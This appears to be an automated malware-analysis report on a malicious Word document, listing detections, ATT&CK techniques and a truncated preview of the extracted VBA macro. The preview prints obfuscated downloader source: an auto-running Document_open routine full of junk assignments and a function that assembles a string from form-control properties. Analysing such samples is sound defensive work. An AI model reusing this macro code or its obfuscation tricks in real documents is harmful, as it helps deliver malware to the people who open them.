MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Office document containing VBA macros, specifically a Document_Open macro designed for auto-execution. Heuristics indicate the use of GetObject, a common technique for executing code. The ClamAV detection as 'Doc.Downloader.Generic' strongly suggests the macro's purpose is to download a second-stage payload. No specific family could be identified, but the behavior is consistent with a downloader.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-7469466-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469466-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12783 bytes |
SHA-256: 6403b5a288dab7046b4ca0b3dd7e349b76dfed983adc780dcc88884b3f1a3f74 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Xpkurgif"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Khytkvtzre, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Nnhdbrror As Boolean
Dim Wsczyedinudly As Double
Hrefgwynxhaep = Bdbekiiwgi
Gnjbimekzjlkb = (Erxandetz)
Goyvywzaranf = 997
Dim Lujrsqcmcdfi As Boolean
Sbtkrofqldlp = "Maxime."
Dim Gfrlficj As Boolean
Dim Hsrulvqp As Boolean
Dim Hqgdoenuj As Integer
Cfbgxmtdz = (561)
Dim Grcywkepnw As Boolean
Dim Tqynxbvha As Double
Enqonjwlooykp = Hcqtrjczhpz
Dim Cekiquxlgwrfr As Integer
Dim Rufjmhtsrg As String
Dim Coiyolzikd As Double
Udebfynayrhm = (Lojltcsivwx)
Urcboemo = ("Neque rerum.")
Snssxnlh = (Yzlzyknbmih)
Dim Wtiwpsixb As Boolean
Ryajvukobk = Gccdrlbawogv
Smadadpylqi
Dim Chuggarpi As String
Dim Qtprgutjyiqb As Boolean
Ydsxhuznccnfi = Wmdwaiqglavg
Ymgdhhxysbiv = (Meblqrcvmepq)
Hwloxvdqhbbuv = 576
Dim Cnefythzkplp As Boolean
Bnqaarvq = "Omnis excepturi voluptatem voluptatem aspernatur est."
Dim Howxzkvwfajqk As String
Dim Czxbymfzpg As Boolean
Dim Uufzmtgykw As Boolean
Auokcqkdgqyrx = (145)
Dim Mbpgrmzabzbxx As Integer
Dim Yfpyadxuwz As Boolean
Edwobwxtwv = Matnlbsmytss
Dim Osphshvcvwflz As Boolean
Dim Lqdpwlzk As String
Dim Vgilkldlci As String
Ocixkfwh = (Smndocfn)
Fyxamqklb = ("Suscipit earum maxime aut.")
Suhbahybuncis = (Yhwbfptxyqfil)
Dim Lfbfzsgcovhl As Boolean
Cqelqsdoatgy = Luznizcxgn
End Sub
Attribute VB_Name = "Rihhrozcvbo"
Attribute VB_Base = "0{67C962F7-255C-4A54-B746-5B48B0549899}{5BCEBDD0-328C-4442-8952-9E678F836C50}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Shqcibig"
Function Gykjilth()
Dim Qeviyzyuj As String
Dim Jpqpoyydzky As Double
Bdukvcnrrdmg = Qjnybvvzy
Rszbfwrkbgu = (Ygbxrmdjdrh)
Mxyycetwdj = 725
Dim Lgvvjawezzu As String
Hmxfoarhsktmd = "Aperiam dolorem veniam."
Dim Lqvxnhgfhnt As Boolean
Dim Pmmdfauswr As Boolean
Dim Whswbjgwh As Integer
Dwfqbgpsuj = (734)
Dim Gxqhcjwpzgor As String
Dim Jgdnudvdigz As Double
Mgzuyppmylbd = Djxhnqoxjo
Dim Cwcokhtrkja As Double
Dim Bkbkubkitsu As Boolean
Dim Lsepwknjmsjka As Boolean
Vaujkslgnm = (Wgjeiclvan)
Pzfpsrzuhz = ("Josh")
Xlagzmrchxqd = (Bhpykifitlm)
Dim Vmufxuphxcf As Boolean
Wsericleqse = Eoproudzvpm
Usevejolgkbmf = Xpkurgif.Khytkvtzre
Dim Ebklouvx As String
Dim Sanyvdfvm As Boolean
Uumgirzil = Paiodzfn
Hrhgccdxspvt = (Gyefcwoxgr)
Qhagqybpmd = 157
Dim Govlskev As String
Hevzkddkkpupm = "In voluptatem minus."
Dim Lyxsexcsdznad As String
Dim Mpgsavlqnymcs As Boolean
Dim Qczoglhdc As Boolean
Msaxcafpd = (396)
Dim Tvaaijtsuk As Double
Dim Jkaoykfmdrujt As Boolean
Vmxdmagjdng = Jjfvjurmblhey
Dim Cbrhrsxfx As Integer
Dim Wcbwasghcum As String
Dim Yzetaqyohahcw As Boolean
Fmdiotyoke = (Yrrlpbrjrod)
Hbpbuuetu = ("Dolores")
Qdkgaluoqba = (Prbepuqiybg)
Dim Mpkfvdobvm As Double
Jgtppfhezm = Aezlhrcdprye
Mkcmnsggedoe = Usevejolgkbmf + Rihhrozcvbo.Ewydckuorvxx + Rihhrozcvbo.Dvophcgtsfed + Rihhrozcvbo.Yasxyxdwcied
Dim Skkwyalsqq As Double
Dim Mhjfhgcm As Boolean
Jqeefvzppt = Gdvkjejwaie
Rjniytptgburu = (Tbajiyafkwx)
Tlaltinl = 81
Dim Rzfuzcato As Integer
Dziudxrddlav = "Perferendis qui."
Dim Vaiymheh As Boolean
Dim Kcebdjdiok As Integer
Dim Srqkwiivqe As String
Ecruccovfzka = (913)
Dim Atisgbkjhri As Boolean
Dim Wyxrfjlxar As Integer
Mvugtgpsg = Nyxriuuamaq
Dim Hheqhszbzlufq As Boolean
Dim Ksjfojkshsc As Double
Dim Rwgvdxylc As String
Nhnnnclrrg = (Qldnxoxyfqtk)
Zbtecitzs = ("Qui quos.")
Wffgklzbcpjaj = (Fafwocjhdkymd)
Dim Rtwqaiss As Boolean
Tjbqpbjdf = Tvstnxbvmywt
Wbwwufouw = Mkcmnsggedoe + Rihhrozcvbo.Iiunyznb + Rihhrozcvbo.Zwwhxbbjtysnu.Tag
Dim Tfwjecjksyb As Boolean
Dim Gyusotyht
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.